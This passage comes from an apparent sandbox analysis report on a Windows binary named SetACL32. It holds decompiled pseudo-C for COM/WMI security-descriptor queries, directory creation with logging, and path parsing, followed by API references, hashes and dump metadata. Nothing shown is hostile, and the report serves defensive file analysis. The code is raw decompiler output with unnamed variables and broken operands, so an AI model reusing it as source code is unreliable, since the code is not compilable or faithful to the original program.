										_t173 = _v48;
										_t108 =  &_v68;
										__imp__CoQueryProxyBlanket(_t173, _t108,  &_v84, 0,  &_v64,  &_v80, 0,  &_v76);
										_t167 = _t108;
										if(_t108 < 0) {
											L22:
											_t109 = _v48;
											 *((intOrPtr*)( *_t109 + 8))(_t109);
										} else {
											__imp__CoSetProxyBlanket(_t173, 0xffffffff, 0xffffffff, 0xffffffff, _v64, 3, 0xffffffff, 0x800);
											_t167 = _t108;
											if(_t108 >= 0) {
												__eflags = _v60;
												_t161 = _v56;
												if(_v60 != 0) {
													E012C33E0(_t133, _v48,  *_t161, _t167, _t173);
													goto L27;
												} else {
													_push(_t145);
													_t114 = E012C37A0(_t133, _v48, _t161, _t167, _t173);
													_t167 = _t114;
													_t180 = _t180 + 4;
													__eflags = _t114;
													if(__eflags == 0) {
														L27:
														_t112 = _v48;
														 *((intOrPtr*)( *_t112 + 8))(_t112);
														__eflags = _t133;
														if(_t133 == 0) {
															__imp__CoUninitialize();
														}
														_t167 = 0;
														__eflags = 0;
													} else {
													}
												}
											} else {
												goto L22;
											}
										}
									}
								}
							}
						} else {
							if(_t166 == 0x80010106) {
								_t133 = 1;
								goto L16;
							}
						}
						_t159 = _a24;
						if(_t159 < 8) {
							L34:
							 *[fs:0x0] = _v16;
							_pop(_t168);
							_pop(_t171);
							_pop(_t134);
							return E012CAE19(_t167, _t134, _v20 ^ _t175, _t159, _t168, _t171);
						} else {
							_t144 = _a4;
							_t159 = 2 + _t159 * 2;
							_t95 = _t144;
							if(_t159 < 0x1000) {
								L33:
								_push(_t159);
								E012CAE27(_t144);
								goto L34;
							} else {
								_t77 = _t144 - 4; // 0x2e33
								_t144 =  *_t77;
								_t159 = _t159 + 0x23;
								if(_t95 - _t144 + 0xfffffffc > 0x1f) {
									goto L37;
								} else {
									goto L33;
								}
							}
						}
					} else {
						_t144 = _a20;
						if(0x7ffffffe - _t144 < 4) {
							goto L36;
						} else {
							_t119 =  >=  ? _a4 :  &_a4;
							E01299780( &_v44, _v60, _t144, L"\\\\.\\", 4,  >=  ? _a4 :  &_a4, _t144);
							_t91 = E012982B0(_t133,  &_a4,  &_v44);
							_t163 = _v24;
							if(_t163 < 8) {
								goto L13;
							} else {
								_t152 = _v44;
								_t164 = 2 + _t163 * 2;
								_t122 = _t152;
								if(_t164 < 0x1000) {
									L12:
									_push(_t164);
									_t91 = E012CAE27(_t152);
									_t180 = _t180 + 8;
									goto L13;
								} else {
									_t144 =  *((intOrPtr*)(_t152 - 4));
									_t159 = _t164 + 0x23;
									if(_t122 - _t144 + 0xfffffffc > 0x1f) {
										goto L37;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				} else {
					_t155 = _v44;
					_t159 = 2 + _t158 * 2;
					_t126 = _t155;
					if(_t159 < 0x1000) {
						L3:
						_push(_t159);
						E012CAE27(_t155);
						_t180 = _t180 + 8;
						goto L4;
					} else {
						_t144 =  *((intOrPtr*)(_t155 - 4));
						_t159 = _t159 + 0x23;
						if(_t126 - _t144 + 0xfffffffc > 0x1f) {
							E012CF35F(_t133, _t144, _t159, __eflags);
							L36:
							E012A1D70(_t144);
							L37:
							_t99 = E012CF35F(_t133, _t144, _t159, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							__imp__#9(_t144);
							return _t99;
						} else {
							goto L3;
						}
					}
				}
			}




















































              0x012c3af1
              0x012c3af3
              0x012c3af5
              0x012c3b00
              0x012c3b04
              0x012c3b09
              0x012c3b0b
              0x012c3b0e
              0x012c3b0f
              0x012c3b10
              0x012c3b11
              0x012c3b15
              0x012c3b1b
              0x012c3b1e
              0x012c3b21
              0x012c3b2a
              0x012c3b2c
              0x012c3b35
              0x012c3b3a
              0x012c3b3d
              0x012c3b48
              0x012c3b52
              0x012c3b59
              0x012c3b62
              0x012c3b6a
              0x012c3b71
              0x012c3b78
              0x012c3b80
              0x012c3b84
              0x012c3b8d
              0x012c3b92
              0x012c3b95
              0x012c3b99
              0x012c3b9e
              0x012c3ba4
              0x012c3bd8
              0x012c3bd8
              0x012c3bda
              0x012c3be1
              0x012c3be8
              0x012c3bec
              0x012c3bf1
              0x012c3bf7
              0x012c3bfc
              0x012c3bfe
              0x012c3c02
              0x012c3c04
              0x012c3c04
              0x012c3bfc
              0x012c3c08
              0x012c3c83
              0x012c3c85
              0x012c3c8c
              0x012c3c93
              0x012c3c99
              0x012c3c9d
              0x012c3cad
              0x012c3cbf
              0x012c3cc5
              0x012c3cc9
              0x012c3cd7
              0x012c3ce9
              0x012c3cef
              0x012c3cf3
              0x012c3d03
              0x012c3d08
              0x012c3d0e
              0x012c3d11
              0x012c3d19
              0x012c3d27
              0x012c3d2b
              0x012c3d2d
              0x012c3d35
              0x012c3d3b
              0x012c3d52
              0x012c3d57
              0x012c3d5d
              0x012c3d61
              0x012c3d82
              0x012c3d82
              0x012c3d88
              0x012c3d63
              0x012c3d76
              0x012c3d7c
              0x012c3d80
              0x012c3d8d
              0x012c3d91
              0x012c3d94
              0x012c3daf
              0x00000000
              0x012c3d96
              0x012c3d96
              0x012c3d9a
              0x012c3d9f
              0x012c3da1
              0x012c3da4
              0x012c3da6
              0x012c3db4
              0x012c3db4
              0x012c3dba
              0x012c3dbd
              0x012c3dbf
              0x012c3dc1
              0x012c3dc1
              0x012c3dc7
              0x012c3dc7
              0x00000000
              0x012c3da8
              0x012c3da6
              0x00000000
              0x00000000
              0x00000000
              0x012c3d80
              0x012c3d61
              0x012c3d35
              0x012c3cf3
              0x012c3c9f
              0x012c3ca5
              0x012c3cab
              0x00000000
              0x012c3cab
              0x012c3ca5
              0x012c3dc9
              0x012c3dcf
              0x012c3dff
              0x012c3e04
              0x012c3e0c
              0x012c3e0d
              0x012c3e0e
              0x012c3e1c
              0x012c3dd1
              0x012c3dd1
              0x012c3dd4
              0x012c3ddb
              0x012c3de3
              0x012c3df5
              0x012c3df5
              0x012c3df7
              0x00000000
              0x012c3de5
              0x012c3de5
              0x012c3de5
              0x012c3de8
              0x012c3df3
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c3df3
              0x012c3de3
              0x012c3c0a
              0x012c3c0a
              0x012c3c17
              0x00000000
              0x012c3c1d
              0x012c3c25
              0x012c3c38
              0x012c3c44
              0x012c3c49
              0x012c3c4f
              0x00000000
              0x012c3c51
              0x012c3c51
              0x012c3c54
              0x012c3c5b
              0x012c3c63
              0x012c3c79
              0x012c3c79
              0x012c3c7b
              0x012c3c80
              0x00000000
              0x012c3c65
              0x012c3c65
              0x012c3c68
              0x012c3c73
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c3c73
              0x012c3c63
              0x012c3c4f
              0x012c3c17
              0x012c3ba6
              0x012c3ba6
              0x012c3ba9
              0x012c3bb0
              0x012c3bb8
              0x012c3bce
              0x012c3bce
              0x012c3bd0
              0x012c3bd5
              0x00000000
              0x012c3bba
              0x012c3bba
              0x012c3bbd
              0x012c3bc8
              0x012c3e1d
              0x012c3e22
              0x012c3e22
              0x012c3e27
              0x012c3e27
              0x012c3e2c
              0x012c3e2d
              0x012c3e2e
              0x012c3e2f
              0x012c3e31
              0x012c3e37
              0x00000000
              0x00000000
              0x00000000
              0x012c3bc8
              0x012c3bb8

              APIs
              • std::locale::_Init.LIBCPMT ref: 012C3B30
                • Part of subcall function 012C9DCB: __EH_prolog3.LIBCMT ref: 012C9DD2
                • Part of subcall function 012C9DCB: std::_Lockit::_Lockit.LIBCPMT ref: 012C9DDD
                • Part of subcall function 012C9DCB: std::locale::_Setgloballocale.LIBCPMT ref: 012C9DF8
                • Part of subcall function 012C9DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 012C9E4E
              • CoInitialize.OLE32(00000000), ref: 012C3C93
              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000002,00000000), ref: 012C3CBF
              • CoCreateInstance.OLE32(012EF698,00000000,00000001,012EF6A8,00000000), ref: 012C3CE9
              • SysAllocStringLen.OLEAUT32(012C0CBD,00000000), ref: 012C3D08
              • SysFreeString.OLEAUT32(00000000), ref: 012C3D2D
              • CoQueryProxyBlanket.OLE32(00000000,?,00000000,00000000,?,00000000,00000000,?), ref: 012C3D57
              • CoSetProxyBlanket.OLE32(00000000,000000FF,000000FF,000000FF,?,00000003,000000FF,00000800), ref: 012C3D76
              • CoUninitialize.OLE32 ref: 012C3DC1
                • Part of subcall function 012C37A0: SysAllocString.OLEAUT32(__systemsecurity=@), ref: 012C3801
                • Part of subcall function 012C37A0: SysAllocString.OLEAUT32(GetSD), ref: 012C3854
                • Part of subcall function 012C37A0: SysFreeString.OLEAUT32(-00000001), ref: 012C3A2E
              • VariantClear.OLEAUT32 ref: 012C3E31
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: String$Alloc$BlanketFreeInitializeLockitProxystd::_std::locale::_$ClearCreateH_prolog3InitInstanceLockit::_Lockit::~_QuerySecuritySetgloballocaleUninitializeVariant
              • String ID: \\.\
              • API String ID: 3821683838-2900601889
              • Opcode ID: 23c284df3b5c9bb7b326fc75307d0ec5ec01d350936fb9156b44647d1866850d
              • Instruction ID: 8e1c3caf9c36c67e6651d974e91e21c244ef537b54dc8a95f52baa6ea135fa72
              • Opcode Fuzzy Hash: 23c284df3b5c9bb7b326fc75307d0ec5ec01d350936fb9156b44647d1866850d
              • Instruction Fuzzy Hash: 3FA1D471A20109AFDB14CFA8DC45BDE7BB9BF44710F24861CF615AB2D4DB719A44CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012C5150 Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 456COMMON
              Download Yara Rule
              C-Code - Quality: 72%
              			E012C5150(char __ecx, signed int* __edx, void* __edi, long __esi, void* __fp0, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v0;
				char _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v56;
				signed int _v60;
				char _v80;
				signed int _v84;
				char _v104;
				signed int _v108;
				signed int _v112;
				short _v128;
				signed int _v132;
				char _v152;
				char _v153;
				char _v154;
				intOrPtr _v156;
				intOrPtr _v158;
				char _v172;
				signed int _v184;
				intOrPtr _v185;
				signed int _v189;
				char _v192;
				signed int* _v196;
				char _v205;
				signed int _v217;
				signed int _v221;
				char _v225;
				signed int _v229;
				char _v237;
				signed int _v249;
				intOrPtr _v250;
				signed int _v254;
				char _v257;
				signed int _v261;
				char _v270;
				signed int _v282;
				char _v290;
				signed int _v294;
				char* _v298;
				signed int _v318;
				void* __ebx;
				void* __ebp;
				signed int _t288;
				signed int* _t297;
				signed int _t303;
				signed int _t305;
				signed int _t306;
				signed int _t311;
				signed int _t313;
				signed int _t314;
				signed int _t320;
				signed int _t327;
				signed int _t329;
				signed int _t330;
				signed int _t334;
				signed int _t341;
				intOrPtr _t350;
				signed int _t357;
				void* _t361;
				intOrPtr _t366;
				signed int _t374;
				void* _t377;
				void* _t379;
				signed int _t380;
				intOrPtr _t387;
				short* _t400;
				intOrPtr _t406;
				intOrPtr _t410;
				signed int _t414;
				long _t418;
				short* _t426;
				intOrPtr _t432;
				intOrPtr _t436;
				signed int _t440;
				short* _t450;
				intOrPtr _t459;
				intOrPtr _t463;
				intOrPtr _t467;
				intOrPtr _t471;
				signed int _t475;
				signed int _t480;
				signed int _t482;
				signed int _t483;
				signed int* _t495;
				signed int _t496;
				signed int _t497;
				signed int _t502;
				signed int _t508;
				signed int _t510;
				char _t514;
				signed int _t518;
				signed int _t519;
				short* _t520;
				signed int _t522;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				intOrPtr _t536;
				signed int _t538;
				char _t543;
				char _t544;
				signed int _t545;
				char _t550;
				char _t551;
				signed int _t552;
				intOrPtr _t560;
				intOrPtr _t561;
				intOrPtr _t562;
				intOrPtr _t563;
				signed int _t564;
				signed int _t566;
				void* _t568;
				void* _t570;
				void* _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				signed int _t576;
				void* _t577;
				void* _t579;
				signed int _t580;
				void* _t581;
				signed int _t583;
				signed int _t584;
				signed int _t585;
				signed int _t587;
				void* _t588;
				signed int _t589;
				signed int _t590;
				signed int _t591;
				void* _t592;
				void* _t593;
				void* _t594;
				signed int _t595;
				signed int _t596;
				signed int _t597;
				void* _t598;
				void* _t599;
				void* _t600;
				signed int _t602;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				void* _t607;
				void* _t608;
				void* _t609;
				void* _t610;
				void* _t611;
				long _t613;
				void* _t614;
				intOrPtr _t615;
				signed int _t616;
				void* _t620;
				void* _t622;
				signed int _t624;
				long _t629;
				void* _t631;
				signed int* _t632;
				signed int _t633;
				signed int _t636;
				signed int _t638;
				signed int _t643;
				signed int _t645;
				signed int _t646;
				signed int _t649;
				signed int _t657;
				signed int _t660;
				signed int _t661;
				signed int _t671;
				void* _t672;

				_t721 = __fp0;
				_t629 = __esi;
				_t565 = __edx;
				_t480 = _t657;
				_t660 = (_t657 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t480 + 4));
				_t643 = _t660;
				_push(0xffffffff);
				_push(0x12ec94b);
				_push( *[fs:0x0]);
				_push(_t480);
				_t661 = _t660 - 0x88;
				_t288 =  *0x1309018; // 0xedd8d3b4
				_v32 = _t288 ^ _t643;
				 *[fs:0x0] =  &_v24;
				_v153 = __edx;
				_v154 = __ecx;
				_v16 = 0;
				_t613 = 0;
				L012C3E70(_t480 + 8, __edx, 0, __esi, __fp0, _t288 ^ _t643, __edi, __esi);
				_t293 =  >=  ?  *(_t480 + 8) : _t480 + 8;
				if(CreateDirectoryW( >=  ?  *(_t480 + 8) : _t480 + 8, 0) != 0) {
					L40:
					__eflags = _v153;
					if(__eflags == 0) {
						goto L55;
					} else {
						_t495 =  *(_t480 + 0x18);
						__eflags = 0x7ffffffe - _t495 - 0x17;
						if(__eflags < 0) {
							goto L64;
						} else {
							__eflags =  *(_t480 + 0x1c) - 8;
							_t398 =  >=  ?  *(_t480 + 8) : _t480 + 8;
							E01299780( &_v104, _v158, _t495, L"Created the directory \'", 0x17,  >=  ?  *(_t480 + 8) : _t480 + 8, _t495);
							_push(1);
							_v16 = 6;
							_t400 = E01299A40( &_v104, _t721, "\'");
							asm("movups xmm0, [eax]");
							asm("movups [ebp-0x44], xmm0");
							asm("movq xmm0, [eax+0x10]");
							asm("movq [ebp-0x34], xmm0");
							 *(_t400 + 0x10) = 0;
							 *(_t400 + 0x14) = 7;
							 *_t400 = 0;
							_v16 = 7;
							_v56 = 0;
							_v40 = 0;
							_v36 = 7;
							_v56 = 0;
							E012A1EE0(_t480,  &_v56, _t565, _t613, _t629, L"CreateDirectoryAPIWrapper", 0x19);
							_push(0x80000000);
							_v16 = 8;
							_push( &_v80);
							_push( &_v56);
							E012A98F0(_t480, _t613, _t721, 1);
							_t589 = _v36;
							__eflags = _t589 - 8;
							if(_t589 < 8) {
								L46:
								_t590 = _v60;
								__eflags = _t590 - 8;
								if(_t590 < 8) {
									L50:
									_t591 = _v84;
									__eflags = _t591 - 8;
									if(__eflags < 0) {
										goto L55;
									} else {
										_t543 = _v104;
										_t592 = 2 + _t591 * 2;
										_t406 = _t543;
										__eflags = _t592 - 0x1000;
										if(__eflags < 0) {
											L53:
											_push(_t592);
											E012CAE27(_t543);
											goto L54;
										} else {
											_t495 =  *(_t543 - 4);
											_t565 = _t592 + 0x23;
											__eflags = _t406 - _t495 + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												goto L65;
											} else {
												goto L53;
											}
										}
									}
								} else {
									_t544 = _v80;
									_t593 = 2 + _t590 * 2;
									_t410 = _t544;
									__eflags = _t593 - 0x1000;
									if(_t593 < 0x1000) {
										L49:
										_push(_t593);
										E012CAE27(_t544);
										_t661 = _t661 + 8;
										goto L50;
									} else {
										_t495 =  *(_t544 - 4);
										_t565 = _t593 + 0x23;
										__eflags = _t410 - _t495 + 0xfffffffc - 0x1f;
										if(__eflags > 0) {
											goto L65;
										} else {
											goto L49;
										}
									}
								}
							} else {
								_t545 = _v56;
								_t594 = 2 + _t589 * 2;
								_t414 = _t545;
								__eflags = _t594 - 0x1000;
								if(_t594 < 0x1000) {
									L45:
									_push(_t594);
									E012CAE27(_t545);
									_t661 = _t661 + 8;
									goto L46;
								} else {
									_t495 =  *(_t545 - 4);
									_t565 = _t594 + 0x23;
									__eflags = _t414 - _t495 + 0xfffffffc - 0x1f;
									if(__eflags > 0) {
										goto L65;
									} else {
										goto L45;
									}
								}
							}
						}
					}
				} else {
					_t418 = GetLastError();
					_t629 = _t418;
					_t613 = _t418;
					if(_t629 == 0) {
						goto L40;
					} else {
						if(_t629 == 0xb7) {
							__eflags = _v153;
							if(__eflags == 0) {
								goto L55;
							} else {
								_t495 =  *(_t480 + 0x18);
								__eflags = 0x7ffffffe - _t495 - 0x1b;
								if(__eflags < 0) {
									goto L62;
								} else {
									__eflags =  *(_t480 + 0x1c) - 8;
									_t424 =  >=  ?  *(_t480 + 8) : _t480 + 8;
									E01299780( &_v104, _v158, _t495, L"Directory already exists: \'", 0x1b,  >=  ?  *(_t480 + 8) : _t480 + 8, _t495);
									_push(1);
									_v16 = 9;
									_t426 = E01299A40( &_v104, __fp0, "\'");
									asm("movups xmm0, [eax]");
									asm("movups [ebp-0x44], xmm0");
									asm("movq xmm0, [eax+0x10]");
									asm("movq [ebp-0x34], xmm0");
									 *(_t426 + 0x10) = 0;
									 *(_t426 + 0x14) = 7;
									 *_t426 = 0;
									_v16 = 0xa;
									_v56 = 0;
									_v40 = 0;
									_v36 = 7;
									_v56 = 0;
									E012A1EE0(_t480,  &_v56, _t565, _t613, _t629, L"CreateDirectoryAPIWrapper", 0x19);
									_push(0x80000000);
									_v16 = 0xb;
									_push( &_v80);
									_push( &_v56);
									E012A98F0(_t480, _t613, __fp0, 0);
									_t595 = _v36;
									__eflags = _t595 - 8;
									if(_t595 < 8) {
										L32:
										_t596 = _v60;
										__eflags = _t596 - 8;
										if(_t596 < 8) {
											L36:
											_t597 = _v84;
											_t613 = _t629;
											__eflags = _t597 - 8;
											if(__eflags < 0) {
												goto L55;
											} else {
												_t550 = _v104;
												_t598 = 2 + _t597 * 2;
												_t432 = _t550;
												__eflags = _t598 - 0x1000;
												if(__eflags < 0) {
													L39:
													_push(_t598);
													E012CAE27(_t550);
													_t613 = _t629;
													L54:
													_t661 = _t661 + 8;
													goto L55;
												} else {
													_t495 =  *(_t550 - 4);
													_t565 = _t598 + 0x23;
													__eflags = _t432 - _t495 + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L63;
													} else {
														goto L39;
													}
												}
											}
										} else {
											_t551 = _v80;
											_t599 = 2 + _t596 * 2;
											_t436 = _t551;
											__eflags = _t599 - 0x1000;
											if(_t599 < 0x1000) {
												L35:
												_push(_t599);
												E012CAE27(_t551);
												_t661 = _t661 + 8;
												goto L36;
											} else {
												_t495 =  *(_t551 - 4);
												_t565 = _t599 + 0x23;
												__eflags = _t436 - _t495 + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													goto L63;
												} else {
													goto L35;
												}
											}
										}
									} else {
										_t552 = _v56;
										_t600 = 2 + _t595 * 2;
										_t440 = _t552;
										__eflags = _t600 - 0x1000;
										if(_t600 < 0x1000) {
											L31:
											_push(_t600);
											E012CAE27(_t552);
											_t661 = _t661 + 8;
											goto L32;
										} else {
											_t495 =  *(_t552 - 4);
											_t565 = _t600 + 0x23;
											__eflags = _t440 - _t495 + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												goto L63;
											} else {
												goto L31;
											}
										}
									}
								}
							}
						} else {
							if(_v154 == 0) {
								L25:
								_t613 = _t629;
								L55:
								_t566 =  *(_t480 + 0x1c);
								_t629 =  !=  ? _t613 : 0;
								if(_t566 < 8) {
									L59:
									 *[fs:0x0] = _v24;
									_pop(_t614);
									_pop(_t631);
									return E012CAE19(_t629, _t480, _v32 ^ _t643, _t566, _t614, _t631);
								} else {
									_t495 =  *(_t480 + 8);
									_t566 = 2 + _t566 * 2;
									_t297 = _t495;
									if(_t566 < 0x1000) {
										L58:
										_push(_t566);
										E012CAE27(_t495);
										goto L59;
									} else {
										_t495 =  *(_t495 - 4);
										_t566 = _t566 + 0x23;
										if(_t297 - _t495 + 0xfffffffc > 0x1f) {
											goto L66;
										} else {
											goto L58;
										}
									}
								}
							} else {
								_t613 = E012A88E0(_t480,  &_v152, _t629, _t613, _t629);
								_v16 = 1;
								_t565 =  *(_t480 + 0x18);
								_t495 = 0x7ffffffe -  *(_t480 + 0x18);
								if(0x7ffffffe < 0xf) {
									E012A1D70(_t495);
									goto L61;
								} else {
									_t448 =  >=  ?  *(_t480 + 8) : _t480 + 8;
									E01299780( &_v128, _v158, _t495, L"The directory \'", 0xf,  >=  ?  *(_t480 + 8) : _t480 + 8, _t565);
									_push(0x20);
									_v16 = 2;
									_t450 = E01299A40( &_v128, __fp0, L"\' could not be created because: ");
									asm("movups xmm0, [eax]");
									asm("movups [ebp-0x44], xmm0");
									asm("movq xmm0, [eax+0x10]");
									asm("movq [ebp-0x34], xmm0");
									 *(_t450 + 0x10) = 0;
									 *(_t450 + 0x14) = 7;
									 *_t450 = 0;
									_push(_t613);
									_v16 = 3;
									E012A6D40(_t480,  &_v104, _t613, _v158,  &_v80);
									_v16 = 4;
									_v56 = 0;
									_v40 = 0;
									_v36 = 7;
									_v56 = 0;
									E012A1EE0(_t480,  &_v56, _t565, _t613, _t629, L"CreateDirectoryAPIWrapper", 0x19);
									_push(0x80000000);
									_v16 = 5;
									_push( &_v104);
									_push( &_v56);
									E012A98F0(_t480, _t613, __fp0, 3);
									_t602 = _v36;
									if(_t602 < 8) {
										L9:
										_t603 = _v84;
										if(_t603 < 8) {
											L13:
											_t604 = _v60;
											if(_t604 < 8) {
												L17:
												_t605 = _v108;
												if(_t605 < 8) {
													L21:
													_t606 = _v132;
													_v112 = 0;
													_v108 = 7;
													_v128 = 0;
													if(_t606 < 8) {
														goto L25;
													} else {
														_t560 = _v152;
														_t607 = 2 + _t606 * 2;
														_t459 = _t560;
														if(_t607 < 0x1000) {
															L24:
															_push(_t607);
															E012CAE27(_t560);
															_t661 = _t661 + 8;
															goto L25;
														} else {
															_t495 =  *(_t560 - 4);
															_t565 = _t607 + 0x23;
															if(_t459 - _t495 + 0xfffffffc > 0x1f) {
																goto L61;
															} else {
																goto L24;
															}
														}
													}
												} else {
													_t561 = _v128;
													_t608 = 2 + _t605 * 2;
													_t463 = _t561;
													if(_t608 < 0x1000) {
														L20:
														_push(_t608);
														E012CAE27(_t561);
														_t661 = _t661 + 8;
														goto L21;
													} else {
														_t495 =  *(_t561 - 4);
														_t565 = _t608 + 0x23;
														if(_t463 - _t495 + 0xfffffffc > 0x1f) {
															goto L61;
														} else {
															goto L20;
														}
													}
												}
											} else {
												_t562 = _v80;
												_t609 = 2 + _t604 * 2;
												_t467 = _t562;
												if(_t609 < 0x1000) {
													L16:
													_push(_t609);
													E012CAE27(_t562);
													_t661 = _t661 + 8;
													goto L17;
												} else {
													_t495 =  *(_t562 - 4);
													_t565 = _t609 + 0x23;
													if(_t467 - _t495 + 0xfffffffc > 0x1f) {
														goto L61;
													} else {
														goto L16;
													}
												}
											}
										} else {
											_t563 = _v104;
											_t610 = 2 + _t603 * 2;
											_t471 = _t563;
											if(_t610 < 0x1000) {
												L12:
												_push(_t610);
												E012CAE27(_t563);
												_t661 = _t661 + 8;
												goto L13;
											} else {
												_t495 =  *(_t563 - 4);
												_t565 = _t610 + 0x23;
												if(_t471 - _t495 + 0xfffffffc > 0x1f) {
													goto L61;
												} else {
													goto L12;
												}
											}
										}
									} else {
										_t564 = _v56;
										_t611 = 2 + _t602 * 2;
										_t475 = _t564;
										if(_t611 < 0x1000) {
											L8:
											_push(_t611);
											E012CAE27(_t564);
											_t661 = _t661 + 8;
											goto L9;
										} else {
											_t495 =  *(_t564 - 4);
											_t565 = _t611 + 0x23;
											if(_t475 - _t495 + 0xfffffffc > 0x1f) {
												L61:
												E012CF35F(_t480, _t495, _t565, 0x7ffffffe - 0xf);
												L62:
												E012A1D70(_t495);
												L63:
												E012CF35F(_t480, _t495, _t565, 0x7ffffffe - 0xf);
												L64:
												E012A1D70(_t495);
												L65:
												E012CF35F(_t480, _t495, _t565, 0x7ffffffe - 0xf);
												L66:
												E012CF35F(_t480, _t495, _t566, 0x7ffffffe - 0xf);
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												_push(_t643);
												_t645 = _t661;
												_push(0xffffffff);
												_push(0x12ec98d);
												_push( *[fs:0x0]);
												_push(_t495);
												_push(_t480);
												_push(_t629);
												_push(_t613);
												_t303 =  *0x1309018; // 0xedd8d3b4
												_push(_t303 ^ _t645);
												_t305 =  &_v192;
												 *[fs:0x0] = _t305;
												_t632 = _t495;
												_v196 = _t632;
												_v196 = _t632;
												_v184 = 0;
												_t615 = _v156;
												_t568 =  >=  ? _v172 :  &_v172;
												_t482 = _t480 | 0xffffffff;
												if(_t615 == 0) {
													L73:
													_t306 = _t305 | 0xffffffff;
													__eflags = _t306;
												} else {
													_t151 = _t615 - 1; // -1
													_t538 =  <  ? _t151 : _t482;
													_t305 = _t568 + _t538 * 2;
													if( *(_t568 + _t538 * 2) == 0x5c) {
														L72:
														_t306 = _t305 - _t568 >> 1;
													} else {
														while(_t305 != _t568) {
															_t305 = _t305 - 2;
															if( *_t305 != 0x5c) {
																continue;
															} else {
																goto L72;
															}
															goto L74;
														}
														goto L73;
													}
												}
												L74:
												_t156 = _t306 + 1; // 0x0
												_t496 = _t156;
												 *_t632 = 0;
												_t632[4] = 0;
												_t632[5] = 7;
												 *_t632 = 0;
												if(_t615 < _t496) {
													E012986E0(_t496, __eflags);
													goto L81;
												} else {
													_t615 = _t615 - _t496;
													_t482 =  <  ? _t615 : _t482;
													_t383 =  >=  ? _v8 :  &_v8;
													E012A1EE0(_t482, _t632, _t568, _t615, _t632, ( >=  ? _v8 :  &_v8) + _t496 * 2, _t482);
													_t587 = _a12;
													if(_t587 < 8) {
														L79:
														 *[fs:0x0] = _v28;
														return _t632;
													} else {
														_t536 = _v8;
														_t588 = 2 + _t587 * 2;
														_t387 = _t536;
														if(_t588 < 0x1000) {
															L78:
															_push(_t588);
															E012CAE27(_t536);
															goto L79;
														} else {
															_t496 =  *(_t536 - 4);
															_t568 = _t588 + 0x23;
															if(_t387 - _t496 + 0xfffffffc > 0x1f) {
																L81:
																E012CF35F(_t482, _t496, _t568, __eflags);
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t645);
																_t646 = _t661;
																_push(0xffffffff);
																_push(0x12ea84d);
																_push( *[fs:0x0]);
																_push(_t496);
																_push(_t632);
																_push(_t615);
																_t311 =  *0x1309018; // 0xedd8d3b4
																_push(_t311 ^ _t646);
																_t313 =  &_v225;
																 *[fs:0x0] = _t313;
																_t633 = _t496;
																_v229 = _t633;
																_v229 = _t633;
																_v217 = 0;
																__eflags = _v185 - 8;
																_t616 = _v189;
																_t570 =  >=  ? _v205 :  &_v205;
																__eflags = _t616;
																if(_t616 == 0) {
																	L88:
																	_t497 = _t496 | 0xffffffff;
																	__eflags = _t497;
																} else {
																	_t530 = _t496 | 0xffffffff;
																	_t178 = _t616 - 1; // -1
																	_t313 = _t178;
																	__eflags = _t313 - _t530;
																	_t531 =  <  ? _t313 : _t530;
																	__eflags =  *(_t570 + _t531 * 2) - 0x2e;
																	_t496 = _t570 + _t531 * 2;
																	if( *(_t570 + _t531 * 2) == 0x2e) {
																		L87:
																		_t497 = _t496 - _t570 >> 1;
																	} else {
																		while(1) {
																			__eflags = _t496 - _t570;
																			if(_t496 == _t570) {
																				goto L88;
																			}
																			_t496 = _t496 - 2;
																			__eflags =  *_t496 - 0x2e;
																			if( *_t496 != 0x2e) {
																				continue;
																			} else {
																				goto L87;
																			}
																			goto L89;
																		}
																		goto L88;
																	}
																}
																L89:
																__eflags = _a8 - 8;
																_t572 =  >=  ? _v12 :  &_v12;
																__eflags = _t616;
																if(_t616 == 0) {
																	L94:
																	_t314 = _t313 | 0xffffffff;
																	__eflags = _t314;
																} else {
																	_t186 = _t616 - 1; // -1
																	_t379 = _t186;
																	__eflags = _t379 - 0xffffffff;
																	_t627 =  <  ? _t379 : 0xffffffff;
																	_t380 =  <  ? _t379 : 0xffffffff;
																	_t616 = _a4;
																	__eflags =  *(_t572 + _t380 * 2) - 0x5c;
																	_t313 = _t572 + _t380 * 2;
																	if( *(_t572 + _t380 * 2) == 0x5c) {
																		L93:
																		_t314 = _t313 - _t572 >> 1;
																	} else {
																		while(1) {
																			__eflags = _t313 - _t572;
																			if(_t313 == _t572) {
																				goto L94;
																			}
																			_t313 = _t313 - 2;
																			__eflags =  *_t313 - 0x5c;
																			if( *_t313 != 0x5c) {
																				continue;
																			} else {
																				goto L93;
																			}
																			goto L95;
																		}
																		goto L94;
																	}
																}
																L95:
